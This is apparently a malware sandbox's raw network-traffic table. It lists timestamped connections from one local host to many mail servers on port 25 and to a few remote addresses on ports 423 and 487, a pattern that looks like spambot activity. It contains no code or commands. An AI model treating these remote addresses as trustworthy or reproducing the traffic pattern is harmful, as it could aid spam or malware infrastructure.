Sep 5, 2021 15:50:15.400336027 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.400366068 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.400978088 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.401148081 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.404175043 CEST	25	49772	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:15.404459953 CEST	25	49772	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:15.404534101 CEST	49772	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:15.411088943 CEST	25	49768	212.227.15.40	192.168.2.4
Sep 5, 2021 15:50:15.419852018 CEST	49772	25	192.168.2.4	194.25.134.8
Sep 5, 2021 15:50:15.419944048 CEST	423	49770	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:15.420073032 CEST	49770	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:15.423898935 CEST	423	49757	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:15.423978090 CEST	49757	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:15.424331903 CEST	423	49759	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:15.424395084 CEST	49759	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:15.425081015 CEST	423	49771	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:15.425196886 CEST	49771	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:15.428009987 CEST	25	49761	208.80.202.60	192.168.2.4
Sep 5, 2021 15:50:15.433885098 CEST	25	49750	213.180.147.146	192.168.2.4
Sep 5, 2021 15:50:15.443418980 CEST	25	49772	194.25.134.8	192.168.2.4
Sep 5, 2021 15:50:15.446459055 CEST	49750	25	192.168.2.4	213.180.147.146
Sep 5, 2021 15:50:15.452024937 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.452356100 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.452512980 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.452678919 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.452846050 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.475342035 CEST	49758	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:15.486709118 CEST	25	49750	213.180.147.146	192.168.2.4
Sep 5, 2021 15:50:15.487015009 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.489020109 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.489391088 CEST	423	49770	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:15.493001938 CEST	49773	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:15.493242979 CEST	49770	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:15.499723911 CEST	423	49771	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:15.499922037 CEST	49771	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:15.525846958 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.525957108 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.526031017 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.526228905 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.526417017 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.526590109 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.526773930 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.526904106 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.526913881 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.526952982 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.527051926 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.528690100 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.537839890 CEST	49750	25	192.168.2.4	213.180.147.146
Sep 5, 2021 15:50:15.538383007 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.538419008 CEST	49750	25	192.168.2.4	213.180.147.146
Sep 5, 2021 15:50:15.544601917 CEST	49760	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.544866085 CEST	25	49761	208.80.202.60	192.168.2.4
Sep 5, 2021 15:50:15.544905901 CEST	25	49761	208.80.202.60	192.168.2.4
Sep 5, 2021 15:50:15.544991970 CEST	49761	25	192.168.2.4	208.80.202.60
Sep 5, 2021 15:50:15.545092106 CEST	49761	25	192.168.2.4	208.80.202.60
Sep 5, 2021 15:50:15.557070971 CEST	423	49758	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:15.557162046 CEST	49758	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:15.562833071 CEST	423	49770	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:15.567409992 CEST	423	49773	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:15.567519903 CEST	49773	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:15.575035095 CEST	423	49771	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:15.576282024 CEST	25	49750	213.180.147.146	192.168.2.4
Sep 5, 2021 15:50:15.576474905 CEST	49750	25	192.168.2.4	213.180.147.146
Sep 5, 2021 15:50:15.593440056 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.594091892 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.594547987 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.594759941 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.598129034 CEST	25	49760	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.635871887 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.636387110 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.636482000 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.636564016 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.636662006 CEST	49762	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:15.641350985 CEST	423	49773	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:15.641530991 CEST	49773	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:15.683367014 CEST	25	49761	208.80.202.60	192.168.2.4
Sep 5, 2021 15:50:15.703768015 CEST	487	49762	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:15.715441942 CEST	423	49773	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:15.805991888 CEST	49774	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:15.911781073 CEST	49775	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:15.912157059 CEST	25	49774	64.98.36.4	192.168.2.4
Sep 5, 2021 15:50:15.912264109 CEST	49774	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:15.914669991 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.959729910 CEST	49763	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:15.959851027 CEST	49764	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:15.960361958 CEST	49765	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:15.960366964 CEST	49776	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:15.960783005 CEST	49777	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:15.961278915 CEST	49778	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:15.968283892 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.971693993 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:15.980127096 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:15.985765934 CEST	423	49764	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:15.985821962 CEST	423	49777	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:15.985943079 CEST	49764	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:15.985980988 CEST	49777	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:15.992233992 CEST	423	49778	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:15.992320061 CEST	423	49765	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:15.992362976 CEST	49778	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:15.992439985 CEST	49765	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:16.000739098 CEST	423	49776	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:16.000886917 CEST	49776	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:16.001696110 CEST	423	49763	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:16.001792908 CEST	49763	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:16.011321068 CEST	423	49777	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:16.023732901 CEST	423	49778	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:16.032289982 CEST	49777	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:16.032532930 CEST	49778	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:16.034308910 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:16.043973923 CEST	423	49776	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:16.044176102 CEST	49776	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:16.046916962 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:16.057622910 CEST	423	49777	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:16.063716888 CEST	423	49778	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:16.078798056 CEST	25	49774	64.98.36.4	192.168.2.4
Sep 5, 2021 15:50:16.085325003 CEST	423	49776	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:16.105534077 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:16.131556034 CEST	49774	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:16.147221088 CEST	49770	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.147274971 CEST	49771	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.148226976 CEST	49779	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.149611950 CEST	49780	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.159003973 CEST	49774	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:16.180233002 CEST	49781	25	192.168.2.4	104.47.58.33
Sep 5, 2021 15:50:16.208076954 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.208833933 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:16.208980083 CEST	49775	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:16.216655016 CEST	423	49770	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:16.216736078 CEST	49770	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.219464064 CEST	423	49780	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:16.219587088 CEST	49780	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.221652985 CEST	423	49771	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:16.221746922 CEST	49771	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.222176075 CEST	423	49779	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:16.222274065 CEST	49779	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.235296965 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.235377073 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.248866081 CEST	49783	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:16.264941931 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.264976025 CEST	25	49774	64.98.36.4	192.168.2.4
Sep 5, 2021 15:50:16.267617941 CEST	25	49774	64.98.36.4	192.168.2.4
Sep 5, 2021 15:50:16.267690897 CEST	49774	25	192.168.2.4	64.98.36.4
Sep 5, 2021 15:50:16.278021097 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.280715942 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:16.287869930 CEST	49773	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:16.288310051 CEST	49785	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:16.289199114 CEST	423	49780	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:16.289554119 CEST	49780	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.296258926 CEST	423	49779	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:16.296487093 CEST	49779	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.305363894 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.308881044 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.313338995 CEST	25	49781	104.47.58.33	192.168.2.4
Sep 5, 2021 15:50:16.313433886 CEST	49781	25	192.168.2.4	104.47.58.33
Sep 5, 2021 15:50:16.317337036 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.345031023 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.357338905 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.359389067 CEST	25	49783	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:16.359427929 CEST	423	49780	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:16.359517097 CEST	49783	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:16.361705065 CEST	423	49773	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:16.361789942 CEST	49773	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:16.362365007 CEST	423	49785	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:16.362449884 CEST	49785	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:16.370244980 CEST	423	49779	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:16.389980078 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.437033892 CEST	423	49785	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:16.437237024 CEST	49785	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:16.447635889 CEST	25	49781	104.47.58.33	192.168.2.4
Sep 5, 2021 15:50:16.460139990 CEST	49781	25	192.168.2.4	104.47.58.33
Sep 5, 2021 15:50:16.508555889 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:16.511296034 CEST	423	49785	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:16.521136045 CEST	49775	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:16.537955999 CEST	49776	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:16.538021088 CEST	49778	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:16.538022995 CEST	49777	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:16.538470030 CEST	49786	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:16.538897038 CEST	49787	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:16.539356947 CEST	49788	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:16.564080000 CEST	423	49777	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:16.564130068 CEST	423	49787	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:16.564178944 CEST	49777	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:16.564265013 CEST	49787	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:16.569247007 CEST	423	49778	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:16.569325924 CEST	49778	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:16.571229935 CEST	423	49788	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:16.571326017 CEST	49788	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:16.578428984 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:16.578547001 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:16.578624010 CEST	423	49776	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:16.578711033 CEST	49776	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:16.579046011 CEST	423	49786	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:16.579122066 CEST	49786	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:16.589828968 CEST	423	49787	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:16.590017080 CEST	49787	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:16.593409061 CEST	25	49781	104.47.58.33	192.168.2.4
Sep 5, 2021 15:50:16.593892097 CEST	25	49781	104.47.58.33	192.168.2.4
Sep 5, 2021 15:50:16.602150917 CEST	49781	25	192.168.2.4	104.47.58.33
Sep 5, 2021 15:50:16.603522062 CEST	423	49788	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:16.603699923 CEST	49788	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:16.615233898 CEST	423	49787	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:16.620210886 CEST	423	49786	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:16.620404005 CEST	49786	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:16.635653019 CEST	423	49788	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:16.636941910 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:16.647326946 CEST	49779	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.647377968 CEST	49780	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.647872925 CEST	49790	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.648303986 CEST	49791	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.656755924 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.661144018 CEST	423	49786	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:16.681106091 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.704731941 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:16.704847097 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:16.708339930 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.709057093 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.715228081 CEST	423	49790	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:16.715348959 CEST	49790	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.717520952 CEST	423	49780	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:16.717827082 CEST	423	49791	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:16.717890978 CEST	49780	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.717914104 CEST	49791	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.721358061 CEST	423	49779	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:16.721473932 CEST	49779	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.735410929 CEST	25	49781	104.47.58.33	192.168.2.4
Sep 5, 2021 15:50:16.736426115 CEST	25	49781	104.47.58.33	192.168.2.4
Sep 5, 2021 15:50:16.736459970 CEST	25	49781	104.47.58.33	192.168.2.4
Sep 5, 2021 15:50:16.736560106 CEST	49781	25	192.168.2.4	104.47.58.33
Sep 5, 2021 15:50:16.737592936 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.750293970 CEST	49781	25	192.168.2.4	104.47.58.33
Sep 5, 2021 15:50:16.765177965 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.765216112 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.765243053 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.765256882 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.765268087 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.765292883 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.782798052 CEST	423	49790	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:16.782983065 CEST	49790	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:16.787003994 CEST	423	49791	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:16.787218094 CEST	49791	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:16.792582035 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.810858965 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:16.811161041 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:16.821317911 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:16.821400881 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:16.829912901 CEST	49775	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:16.850317955 CEST	423	49790	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:16.852706909 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.855849028 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.856232882 CEST	423	49791	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:16.878030062 CEST	49792	25	192.168.2.4	212.227.17.5
Sep 5, 2021 15:50:16.879039049 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:16.883347988 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:16.883574963 CEST	25	49781	104.47.58.33	192.168.2.4
Sep 5, 2021 15:50:16.883616924 CEST	25	49782	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:16.883702993 CEST	49782	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:16.900759935 CEST	25	49792	212.227.17.5	192.168.2.4
Sep 5, 2021 15:50:16.900897980 CEST	49792	25	192.168.2.4	212.227.17.5
Sep 5, 2021 15:50:16.922183037 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:16.925936937 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:16.925976992 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:16.928064108 CEST	25	49792	212.227.17.5	192.168.2.4
Sep 5, 2021 15:50:16.928097010 CEST	25	49792	212.227.17.5	192.168.2.4
Sep 5, 2021 15:50:16.928261995 CEST	49792	25	192.168.2.4	212.227.17.5
Sep 5, 2021 15:50:16.928525925 CEST	49785	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:16.929049015 CEST	49793	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:16.935575962 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:16.943799019 CEST	49792	25	192.168.2.4	212.227.17.5
Sep 5, 2021 15:50:16.959148884 CEST	25	49783	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:16.959343910 CEST	25	49783	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:16.959425926 CEST	49783	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:16.961992025 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:16.966291904 CEST	25	49792	212.227.17.5	192.168.2.4
Sep 5, 2021 15:50:16.978301048 CEST	49783	25	192.168.2.4	17.42.251.10
Sep 5, 2021 15:50:16.991060019 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:16.993603945 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:16.994016886 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:16.994169950 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:16.994605064 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:16.995054960 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:16.998541117 CEST	423	49793	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:16.998641968 CEST	49793	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:17.002566099 CEST	423	49785	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:17.002625942 CEST	49785	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:17.007819891 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:17.015547991 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.016107082 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.044867039 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.045425892 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.045537949 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.045579910 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.047183037 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:17.047229052 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.047296047 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.047347069 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.047396898 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.047444105 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.068631887 CEST	423	49793	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:17.068845987 CEST	49793	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:17.086890936 CEST	49794	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:17.087146997 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:17.088907003 CEST	25	49783	17.42.251.10	192.168.2.4
Sep 5, 2021 15:50:17.100759983 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.100790024 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.100824118 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.100961924 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.101037979 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.112643003 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:17.112809896 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:17.113141060 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.113643885 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.114073992 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.115339994 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.115499020 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.115725040 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.116058111 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.116255999 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.130201101 CEST	25	49775	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:17.138562918 CEST	423	49793	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:17.142291069 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:17.142410994 CEST	49775	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:17.161022902 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.161056042 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.161134005 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.161323071 CEST	49789	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:17.227106094 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.227201939 CEST	25	49769	142.250.150.27	192.168.2.4
Sep 5, 2021 15:50:17.227288008 CEST	49769	25	192.168.2.4	142.250.150.27
Sep 5, 2021 15:50:17.229054928 CEST	487	49789	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:17.233102083 CEST	25	49794	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:17.233215094 CEST	49794	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:17.264594078 CEST	49796	25	192.168.2.4	54.162.196.70
Sep 5, 2021 15:50:17.272316933 CEST	49786	423	192.168.2.4	95.216.195.92
